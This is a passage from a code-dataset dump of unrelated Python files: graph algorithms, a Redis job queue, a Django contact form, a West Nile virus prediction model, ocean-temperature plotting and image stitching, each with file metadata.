{"api_name": "pdart.labels.hst_parameters.get_exposure_duration", "line_number": 240, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_hst_parameters", "line_number": 253, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.mk_Investigation_Area_name", "line_number": 257, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.mk_Investigation_Area_lidvid", "line_number": 258, "usage_type": "call"}, {"api_name": "pdart.labels.observing_system.instrument_host_lidvid", "line_number": 260, "usage_type": "call"}, {"api_name": "pdart.labels.observing_system.observing_system_lidvid", "line_number": 262, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 275, "usage_type": "name"}, {"api_name": "pdart.xml.templates.NodeBuilder", "line_number": 275, "usage_type": "name"}, {"api_name": "pdart.labels.target_identification.create_target_identification_nodes", "line_number": 276, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_instrument_id", "line_number": 281, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_detector_ids", "line_number": 282, "usage_type": "call"}, {"api_name": 
"pdart.labels.hst_parameters.get_filter_name", "line_number": 283, "usage_type": "call"}, {"api_name": "wavelength_ranges.wavelength_ranges", "line_number": 284, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_channel_id", "line_number": 288, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_titles_format", "line_number": 290, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_processing_level", "line_number": 312, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 313, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 313, "usage_type": "name"}, {"api_name": "pdart.labels.utils.lidvid_to_lid", "line_number": 321, "usage_type": "call"}, {"api_name": "pdart.labels.utils.lidvid_to_vid", "line_number": 322, "usage_type": "call"}, {"api_name": "pdart.labels.file_contents.get_file_contents", "line_number": 326, "usage_type": "call"}, {"api_name": "pdart.labels.investigation_area.investigation_area", "line_number": 329, "usage_type": "call"}, {"api_name": "pdart.labels.observing_system.observing_system", "line_number": 332, "usage_type": "call"}, {"api_name": "pdart.labels.time_coordinates.get_time_coordinates", "line_number": 333, "usage_type": "call"}, {"api_name": "pdart.xml.templates.combine_nodes_into_fragment", "line_number": 334, "usage_type": "call"}, {"api_name": "pdart.labels.primary_result_summary.primary_result_summary", "line_number": 338, "usage_type": "call"}, {"api_name": "pdart.labels.doc_reference_list.make_document_reference_list", "line_number": 339, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_collection_type", "line_number": 344, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.make_data_label", "line_number": 346, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.make_misc_label", "line_number": 348, "usage_type": "call"}, {"api_name": "pdart.labels.label_error.LabelError", "line_number": 356, "usage_type": "call"}, {"api_name": "pdart.xml.pretty.pretty_and_verify", "line_number": 360, "usage_type": "call"}]} +{"seq_id": "74919621", "text": "from src.GraphAlgoInterface import GraphAlgoInterface\nfrom DiGraph import DiGraph\nfrom GraphInterface import GraphInterface\nimport json\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport os\nimport math\n\n\nclass GraphAlgo(GraphAlgoInterface):\n def __init__(self, g: tuple = None):\n if g is None:\n self.g = DiGraph()\n else:\n self.g = g\n\n def get_graph(self) -> GraphInterface:\n return self.g\n\n def load_from_json(self, file_name: str):\n self.g=DiGraph()\n with open(file_name) as f:\n data = json.load(f)\n for n in data['Nodes']:\n self.g.add_node(n['id'])\n for e in data['Edges']:\n self.g.add_edge(e['src'], e['dest'], e['w'])\n\n def save_to_json(self, file_name: str):\n data = {\n \"Edges\": [],\n \"Nodes\": []\n }\n for n in self.g.get_all_v().keys():\n data[\"Nodes\"].append({\"id\": n})\n for n in self.g.get_all_v().keys():\n for n2, w in self.g.all_out_edges_of_node(n).items():\n data[\"Edges\"].append({\"src\": n, \"w\": w, \"dest\": n2})\n with open(file_name, 'w+') as f:\n json.dump(data, f)\n\n def shortest_path(self, id1: int, id2: int) -> (float, list):\n distancedict = {}\n q = []\n list = []\n q.append(id1)\n distancedict.update({id1: 0})\n while len(q) != 0:\n tmp = q.pop(0)\n for i in self.g.all_out_edges_of_node(tmp):\n if i not in distancedict:\n q.append(i)\n distancedict.update({i: self.g.all_out_edges_of_node(tmp)[i] + 
distancedict[tmp]})\n elif (self.g.all_out_edges_of_node(tmp)[i] + distancedict[tmp]) < distancedict[i]:\n q.append(i)\n distancedict.update({i: self.g.all_out_edges_of_node(tmp)[i] + distancedict[tmp]})\n if not id2 in distancedict:\n return math.inf, []\n tmp2 = id2\n\n while tmp2 != id1:\n for i in self.g.all_in_edges_of_node(tmp2):\n distancedict[i]\n if (self.g.all_out_edges_of_node(i)[tmp2] + distancedict[i] == distancedict[tmp2]):\n list.append(i)\n tmp2 = i\n break\n list.reverse()\n list.append(id2)\n return (distancedict[id2], list)\n\n def SCCUtil(self, u):\n next = 0\n nextgroup = 0\n index = [None] * self.g.v_size()\n lowlink = [None] * self.g.v_size()\n onstack = [False] * self.g.v_size()\n stack = []\n groups = []\n groupid = {}\n work = [(u, 0)]\n while work:\n v, i = work[-1]\n del work[-1]\n if i == 0:\n index[v] = next\n lowlink[v] = next\n next += 1\n stack.append(v)\n onstack[v] = True\n recurse = False\n for j in self.g.all_out_edges_of_node(v).keys():\n w = j\n if index[w] == None:\n work.append((v, j + 1))\n work.append((w, 0))\n recurse = True\n break\n elif onstack[w]:\n lowlink[v] = min(lowlink[v], index[w])\n if recurse: continue\n if index[v] == lowlink[v]:\n com = []\n while True:\n w = stack[-1]\n del stack[-1]\n onstack[w] = False\n com.append(w)\n groupid[w] = nextgroup\n if w == v: break\n groups.append(com)\n nextgroup += 1\n if work:\n w = v\n v, _ = work[-1]\n lowlink[v] = min(lowlink[v], lowlink[w])\n return groups\n\n\n def connected_component(self, id1: int):\n for i in self.SCCUtil(id1):\n for j in i:\n if (j == id1):\n return i\n return list()\n\n def Diff(self,li1, li2):\n return (list(list(set(li1) - set(li2)) + list(set(li2) - set(li1))))\n def connected_components(self):\n check=list(self.g.get_all_v().keys())\n ans=list()\n for i in self.g.get_all_v().keys():\n obj=self.SCCUtil(i)\n for j in obj:\n if check.__contains__(j[0]):\n j.reverse()\n ans.append(j)\n check=self.Diff(check,j)\n\n if not self.g.get_all_v().keys():\n ans.append(list())\n return ans\n\n\n def plot_graph(self):\n for key, val in self.g.get_all_v().items():\n for node, _ in self.g.all_out_edges_of_node(key).items():\n x2, y2 = self.g.get_all_v()[node]\n x1, y1 = val\n plt.plot([x1, x2], [y1, y2], marker='o')\n plt.show()\n", "sub_path": "EX3/src/GraphAlgo.py", "file_name": "GraphAlgo.py", "file_ext": "py", "file_size_in_byte": 4946, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "src.GraphAlgoInterface.GraphAlgoInterface", "line_number": 11, "usage_type": "name"}, {"api_name": "DiGraph.DiGraph", "line_number": 14, "usage_type": "call"}, {"api_name": "GraphInterface.GraphInterface", "line_number": 18, "usage_type": "name"}, {"api_name": "DiGraph.DiGraph", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 59, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}]} +{"seq_id": "586590461", "text": "#\n# Author: Vincenzo Musco (http://www.vmusco.com)\n\nimport hashlib\nimport time\nimport random\n\nfrom mlperf.tools.config import TEMPFOLDER\n\nfrom 
scipy.stats.mstats import gmean\nfrom numpy import array\n\ndef computeMD5ResultIdentity(labels):\n md5 = hashlib.md5()\n\n for label in labels:\n md5.update(label)\n\n return md5.hexdigest()\n\n\ndef dumpDataOnCleanCsv(dataLessTarget):\n tempFile = \"{}/{}_{}.csv\".format(TEMPFOLDER, int(time.time()), random.randint(1,10000))\n\n fp = open(tempFile, \"w\")\n fp.write(dataLessTarget.to_csv(index=False, header=False))\n fp.close()\n\n return tempFile\n\n\ndef gmeanFixed(alist):\n gmeanConverted = list(map(lambda x: x + 1.1, alist))\n ret = gmean(array(gmeanConverted)) - 1.1\n return float(ret)\n", "sub_path": "mlperf/clustering/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 754, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "hashlib.md5", "line_number": 14, "usage_type": "call"}, {"api_name": "mlperf.tools.config.TEMPFOLDER", "line_number": 23, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.stats.mstats.gmean", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "123406843", "text": "import shutil\nimport pytest\nfrom pathlib import Path\n\nfrom databroker.v2 import temp\nfrom pkg_resources import resource_filename\nfrom xpdacq.ipysetup import (CalibPreprocessor, UserInterface,\n _set_calib_preprocessor)\nfrom xpdacq.simulators import PerkinElmerDetector, Stage\nfrom xpdsim import cs700, fb, ring_current, shctl1, xpd_pe1c\n\n_PONI_FILFE = Path(resource_filename(\"xpdacq\", \"tests/Ni_poni_file.poni\"))\n\n\n@pytest.mark.skip\ndef test_ipysetup(beamline_config_file):\n db = temp()\n ui = UserInterface(\n area_dets=[xpd_pe1c],\n det_zs=[None],\n shutter=shctl1,\n temp_controller=cs700,\n filter_bank=fb,\n ring_current=ring_current,\n db=db,\n blconfig_yaml=beamline_config_file,\n test=True\n )\n assert ui is not None\n\n\n@pytest.mark.skip\ndef test__set_calib_preprocessor(tmp_path: Path):\n det = PerkinElmerDetector(name=\"det\")\n det_z = Stage(name=\"det_stage\").z\n poni_file = tmp_path.joinpath(_PONI_FILFE.name)\n shutil.copy(_PONI_FILFE, poni_file)\n dct = {\n \"config_base\": str(poni_file.parent),\n \"calib_config_name\": poni_file.name\n }\n # case 1\n cpp1 = CalibPreprocessor(det)\n _set_calib_preprocessor(cpp1, dct, None)\n assert cpp1._cache\n first = next(iter(cpp1._cache.keys()))\n assert dict(first) == dict()\n # case 2\n cpp2 = CalibPreprocessor(det)\n _set_calib_preprocessor(cpp2, dct, det_z)\n assert cpp2._cache\n first = next(iter(cpp2._cache.keys()))\n assert dict(first) == {det_z.name: det_z.get()}\n", "sub_path": "xpdacq/tests/test_ipysetup.py", "file_name": "test_ipysetup.py", "file_ext": "py", "file_size_in_byte": 1569, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "pkg_resources.resource_filename", "line_number": 12, "usage_type": "call"}, {"api_name": "databroker.v2.temp", "line_number": 17, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup.UserInterface", "line_number": 18, "usage_type": "call"}, {"api_name": "xpdsim.xpd_pe1c", "line_number": 19, "usage_type": "name"}, {"api_name": "xpdsim.shctl1", "line_number": 21, "usage_type": "name"}, {"api_name": "xpdsim.cs700", "line_number": 22, "usage_type": 
"name"}, {"api_name": "xpdsim.fb", "line_number": 23, "usage_type": "name"}, {"api_name": "xpdsim.ring_current", "line_number": 24, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "name"}, {"api_name": "xpdacq.simulators.PerkinElmerDetector", "line_number": 34, "usage_type": "call"}, {"api_name": "xpdacq.simulators.Stage", "line_number": 35, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 37, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup.CalibPreprocessor", "line_number": 43, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup._set_calib_preprocessor", "line_number": 44, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup.CalibPreprocessor", "line_number": 49, "usage_type": "call"}, {"api_name": "xpdacq.ipysetup._set_calib_preprocessor", "line_number": 50, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "307960278", "text": "# import the necessary packages\nimport redis\nfrom redis_collections import Dict\nfrom redis import StrictRedis\ncache = StrictRedis()\nfrom datetime import datetime\nimport json\njob = Dict()\nimport yaml\n\nif __name__ == \"__main__\":\n \n db = redis.Redis('localhost')\n \n #first pull the job queue history\n mluserJob = (db.hgetall(\"jobqueu2e\")) \n for userJob in mluserJob.items(): \n #loop through to groom job queue - either purge or process\n entry = {}\n id = int(userJob[0].decode(\"utf-8\"))\n print(str(id) + '....')\n entry = yaml.load(userJob[1])\n print(entry)\n \n try:\n if (entry['Done Date']):\n print (str(id) + ' already done')\n except: \n entry[\"status\"] = \"Done\"\n entry[\"Done Date\"] = str(datetime.now())\n print('Job Processed')\n job[id] = json.dumps(entry)\n print (job)\n db.hmset('jobqueu2e',job)\n\n", "sub_path": "pull_queue_process.py", "file_name": "pull_queue_process.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "redis.StrictRedis", "line_number": 5, "usage_type": "call"}, {"api_name": "redis_collections.Dict", "line_number": 8, "usage_type": "call"}, {"api_name": "redis.Redis", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "23195962", "text": "from builtins import object\nfrom pyspark.sql.functions import udf\n\nfrom bi.common.datafilterer import DataFrameFilterer\n\n\nclass DataFilterHelper(object):\n def __init__(self, data_frame, df_context):\n self._data_frame = data_frame\n self._df_context = df_context\n self._pandas_flag = self._df_context._pandas_flag\n\n def clean_data_frame(self):\n \"\"\"\n used to convert dimension columns to measures takes input from config (measure suggestions).\n \"\"\"\n try:\n func = udf(lambda x: utils.tryconvert(x), FloatType())\n self._data_frame = self._data_frame.select(*[func(c).alias(c) if c in self.measure_suggestions else c for c in self.columns])\n self._data_frame.schema.fields\n except:\n pass\n\n def set_params(self):\n self.subset_columns = self._df_context.get_column_subset()\n if not self.subset_columns==None:\n self._data_frame = 
self.subset_data_frame(self.subset_columns)\n\n self.measure_suggestions = self._df_context.get_measure_suggestions()\n\n if self.measure_suggestions != None:\n self.measure_suggestions = [m for m in self.measure_suggestions if m in self.subset_columns]\n if len(self.measure_suggestions)>0:\n self.clean_data_frame()\n\n self.df_filterer = DataFrameFilterer(self._data_frame, self._pandas_flag)\n self.dimension_filter = self._df_context.get_dimension_filters()\n if not self.dimension_filter==None:\n for colmn in list(self.dimension_filter.keys()):\n self.df_filterer.values_in(colmn, self.dimension_filter[colmn])\n self.measure_filter = self._df_context.get_measure_filters()\n if not self.measure_filter==None:\n for colmn in list(self.measure_filter.keys()):\n self.df_filterer.values_between(colmn, self.measure_filter[colmn][0],self.measure_filter[colmn][1],1,1)\n\n self._data_frame = self.df_filterer.get_filtered_data_frame()\n\n def get_data_frame(self):\n return self._data_frame\n\n def subset_data_frame(self, columns):\n return self._data_frame.select(*columns)\n", "sub_path": "bi/common/datafilterhelper.py", "file_name": "datafilterhelper.py", "file_ext": "py", "file_size_in_byte": 2178, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "builtins.object", "line_number": 7, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.udf", "line_number": 18, "usage_type": "call"}, {"api_name": "bi.common.datafilterer.DataFrameFilterer", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "44571020", "text": "from django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render\n\nfrom .forms import ContactForm\n\n# Create your views here.\n\n\ndef home(request):\n title = \"Contact G Fitness\"\n form = ContactForm(request.POST or None)\n confirm_message = None\n\n if form.is_valid():\n name = form.cleaned_data['name']\n sender = form.cleaned_data['email']\n received_message = form.cleaned_data['message']\n subject = 'Message from G Fitness Contact Form'\n sent_message = '{} {}'.format(received_message, name)\n to_us = [settings.EMAIL_HOST_USER]\n send_mail(subject, sent_message, sender,\n to_us, fail_silently=True)\n title = 'Thank you'\n confirm_message = \"\"\"\n Thank you for your message. 
We have received it, and we are reviewing it.\n \"\"\"\n form = None\n\n context = {\n 'title': title,\n 'form': form,\n 'confirm_message': confirm_message\n }\n return render(request, 'contact.html', context)\n", "sub_path": "contact/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1061, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.ContactForm", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.settings.EMAIL_HOST_USER", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "624590245", "text": "\nimport pandas as pd\nimport numpy as np\nfrom sklearn import ensemble\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.feature_selection import SelectFromModel\nfrom datetime import datetime\nimport processor_weather\nimport processor_maindata\n\nIMPORTANCE_THRESHOLD = 0.01\n\ndef build_model(train,test,features,target,classifier_to_use,param_distributions,cv=None):\n \n '''\n build a model using RFC (default) or GBC\n - automated cross-validation search of hyperparameters\n - automated feature selection\n '''\n if cv == None:\n cv = 3\n\n if classifier_to_use=='GBC':\n classifier = ensemble.GradientBoostingClassifier()\n else:\n classifier = ensemble.RandomForestClassifier()\n \n # optimal hyperparameters (using GridSearchCV)\n myCV = GridSearchCV(classifier, param_distributions,\n scoring='roc_auc', n_jobs=-1, cv=cv, verbose=0)\n\n myCV.fit(train[features], y=train[target])\n\n clf = myCV.best_estimator_\n print (\"best params: \",myCV.best_params_)\n\n print (\"Feature Importance (all features): \")\n for feature, importance in sorted(zip(features,clf.feature_importances_), key=lambda x:x[1],reverse=True):\n print (feature, importance)\n \n # feature selection\n sfm = SelectFromModel(clf,threshold=IMPORTANCE_THRESHOLD)\n X_train_transform = sfm.fit_transform(train[features],train[target])\n X_test_transform = sfm.transform(test[features])\n\n clf.fit(X_train_transform,train[target])\n \n model_statistics(clf, X_train_transform, train[target], X_test_transform,test[target])\n\n \n return myCV.best_params_, clf, sfm\n\n\n\ndef model_statistics(model,X_train,y_train, X_val, y_val):\n '''\n report model performance\n '''\n predict_scores = model.predict_proba(X_train)\n print (\"train AUC: \", roc_auc_score(y_train, predict_scores[:,1]))\n \n predict_scores = model.predict_proba(X_val)\n print (\"test AUC: \", roc_auc_score(y_val, predict_scores[:,1]))\n return\n\n\n# Load dataset \ntrain_in = pd.read_csv('../input/train.csv')\ntest_in = pd.read_csv('../input/test.csv')\nweather_in = pd.read_csv('../input/weather.csv')\n#spray_in = pd.read_csv('../input/spray.csv')\nsample = pd.read_csv('../input/sampleSubmission.csv')\n\n# parameters\ntarget = 'WnvPresent'\nMIN_HIT = 30 # for random forest min_leaf_samples\n\n\n# encode categorical features\ntrain_cat, test_cat = processor_maindata.encode_categorical_features(train_in, test_in, 'Species')\ntrain_cat, test_cat = processor_maindata.encode_trap(train_cat, test_cat)\n\n# process weather data\nweather = processor_weather.transform_data(weather_in)\n\n\ntrain_in_transformed = processor_maindata.transform_data(train_cat, 
target=target)\ntrain_in_transformed = processor_maindata.merge_weather(train_in_transformed, weather)\n\ntest_transformed = processor_maindata.transform_data(test_cat)\ntest_transformed = processor_maindata.merge_weather(test_transformed, weather)\n\n# split provided train into training and out_of_time test sets\ntest_year = 2013\nmytrain = train_in_transformed[train_in_transformed['year']!=test_year]\nmytest = train_in_transformed[train_in_transformed['year']==test_year]\nprint ('my training, test sets:', len(mytrain), len(mytest))\n\n# prepare for training\nfeatures = processor_maindata.features + processor_weather.features \nprint('features',features)\nmin_samples_leaf = int(MIN_HIT / mytrain[target].mean())\nprint ('min_samples_leaf',min_samples_leaf)\n\n# random forest\n#param_distributions={'n_estimators':[500],\n# 'min_samples_leaf':[min_samples_leaf,int(1.5*min_samples_leaf)],\n# 'max_features':['sqrt','log2',None]\n# }\n#best_params, clf = build_model(mytrain,mytest,features,target,'RFC',param_distributions,5)\n\n# gradient boosting classifier\nparam_distributions={'n_estimators':[15,25,50],\n 'learning_rate':[0.1,0.125],\n 'min_samples_leaf':[int(0.5*min_samples_leaf), min_samples_leaf],\n 'subsample':[.4,.5,.6]\n }\nbest_params, clf, sfm = build_model(mytrain,mytest,features,target,'GBC',param_distributions,5)\n\n\n# retrain model with all training data\ntrain = train_in_transformed\nmin_samples_leaf = int(MIN_HIT / train_in_transformed[target].mean())\nprint ('min_samples_leaf',min_samples_leaf)\n\n#clf = ensemble.RandomForestClassifier(max_features=best_params['max_features'], \n# n_estimators=best_params['n_estimators'],\n# min_samples_leaf=best_params['min_samples_leaf']) )\nclf = ensemble.GradientBoostingClassifier(subsample=best_params['subsample'],\n n_estimators=best_params['n_estimators'],\n min_samples_leaf=min_samples_leaf,\n learning_rate=best_params['learning_rate'])\n\nX_train_transformed = sfm.transform(train[features])\nclf.fit(X_train_transformed,train[target])\n\npredict_scores = clf.predict_proba(X_train_transformed)\nprint (\"final train AUC: \", roc_auc_score(train[target], predict_scores[:,1]))\n\n# create predictions and submission file\ntest_transformed = processor_maindata.transform_data(test_cat)\ntest_transformed = processor_maindata.merge_weather(test_transformed, weather)\ntest = test_transformed\nX_test_transformed = sfm.transform(test[features])\n\npredictions = clf.predict_proba(X_test_transformed)[:,1]\nsample['WnvPresent'] = predictions\nsample.to_csv('predicted_proba.csv', index=False)\n\n\n\n\n", "sub_path": "model_weatherMTW_featureSelect.py", "file_name": "model_weatherMTW_featureSelect.py", "file_ext": "py", "file_size_in_byte": 5540, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 25, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 64, 
"usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 73, "usage_type": "call"}, {"api_name": "processor_maindata.encode_categorical_features", "line_number": 81, "usage_type": "call"}, {"api_name": "processor_maindata.encode_trap", "line_number": 82, "usage_type": "call"}, {"api_name": "processor_weather.transform_data", "line_number": 85, "usage_type": "call"}, {"api_name": "processor_maindata.transform_data", "line_number": 88, "usage_type": "call"}, {"api_name": "processor_maindata.merge_weather", "line_number": 89, "usage_type": "call"}, {"api_name": "processor_maindata.transform_data", "line_number": 91, "usage_type": "call"}, {"api_name": "processor_maindata.merge_weather", "line_number": 92, "usage_type": "call"}, {"api_name": "processor_maindata.features", "line_number": 101, "usage_type": "attribute"}, {"api_name": "processor_weather.features", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 130, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 139, "usage_type": "call"}, {"api_name": "processor_maindata.transform_data", "line_number": 142, "usage_type": "call"}, {"api_name": "processor_maindata.merge_weather", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "397612871", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mar 24,2021\r\nRoutine to plot CFRF temporal range of data per vessel\r\nNote: this is using raw data, not \"fixed\"\r\n@author: James.manning\r\n\"\"\"\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nreadall=True# read from saved dataframe file called \"cfrf_all\" (if false read all the bi-annual files)\r\nfiles=['2014 to 2016','2016 to 2018','2018 to 2020','2020 to 1_21_2021']\r\n\r\nif readall==False: # need to read all the individual files and compile them\r\n for k in range(len(files)):\r\n infile='CFRF_LobsterCrabResearchFleet_TempData_'+files[k]+'.xlsx'\r\n print('reading '+infile)\r\n df1=pd.read_excel(infile)\r\n if k==0:\r\n df=df1\r\n else:\r\n df=pd.concat([df, pd.read_excel(infile)], axis=0)\r\n df.to_pickle('cfrf_all')\r\nelse:\r\n df=pd.read_pickle('cfrf_all') # reads one big file created \r\n print('assumes df is already loaded')\r\n\r\ndf['datet']=pd.to_datetime(df['when_sampled'])# converts string to datetime variable\r\ndf.set_index('datet') # makes datet the index of the matrix\r\n\r\n# Fix positions such as positive longitudes that should be negative\r\ndf['longitude']=abs(df['longitude'])*-1. 
# makes sure all are negative\r\nid=np.where(df['longitude'].values<-100.)[0]\r\nprint(str(df['when_sampled'].values[id[0]])+' had position in DDMM '+str(df['longitude'].values[id[0]])+' DDMM format (see vessel '+str(df['vessel_id'].values[id[0]])+')') \r\n#for k in list(id):\r\n# [df['latitude'][k],df['longitude'][k]]=dm2dd(df['latitude'].values[k],-1*df['longitude'].values[k])\r\n#df=df.drop(df.index[id],inplace=True) # gets rid of these \r\n\r\nfig, ax = plt.subplots()\r\nimport seaborn as sns\r\npalette = sns.color_palette(None, 26)\r\nplt.title('moored bottom temperature temporal coverage by vessel#')\r\nplt.suptitle('CFRF 2014-present', fontsize=20)\r\nvessel_list=np.unique(df['vessel_id'])\r\ny=0\r\nfor j in vessel_list:\r\n dfds=df[df['vessel_id']==j]\r\n #if j==999:\r\n # j=49\r\n print(' ')\r\n print(j)\r\n min=np.min(dfds['datet'].values)\r\n max=np.max(dfds['datet'].values)\r\n ax.plot([min,max],[y,y],color=palette[y],linestyle='-',linewidth=4)\r\n ax.scatter(dfds['datet'].values,[y]*len(dfds),color='k')\r\n ax.annotate(str(j), (min,y),color=palette[y],fontsize=12, xytext=(-17,-1.),fontweight='bold', textcoords='offset points')\r\n y=y+1\r\n \r\nplt.show()\r\nfig.savefig('plt_cfrf_temporal_coverage_all.png')", "sub_path": "cfrf/plt_cfrf_temporal_coverage.py", "file_name": "plt_cfrf_temporal_coverage.py", "file_ext": "py", "file_size_in_byte": 2450, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_excel", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "seaborn.color_palette", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "218869835", "text": "from os import listdir\nfrom PIL import Image\n\n\n\ndef pinjie():\n # Get all PNG images in the picture folder\n im_list = [Image.open('F:/picture/' + fn) for fn in listdir('F:/picture') if fn.endswith('.png')]\n img1 = Image.open('F:/picture/29.png')\n img2 = Image.open('F:/picture/33.png')\n im_list.append(img1)\n im_list.append(img2)\n # Resize all images to the same size\n ims = []\n for i in im_list:\n new_img = i.resize((1280, 1280), Image.BILINEAR)\n ims.append(new_img)\n\n # Size of a single image\n width, height = ims[0].size\n\n # Create a blank long image\n result = Image.new(ims[0].mode, (width, height * len(ims)))\n\n # Stitch the images together\n for i, im in enumerate(ims):\n result.paste(im, box=(0, i * height))\n\n # Save the result\n 
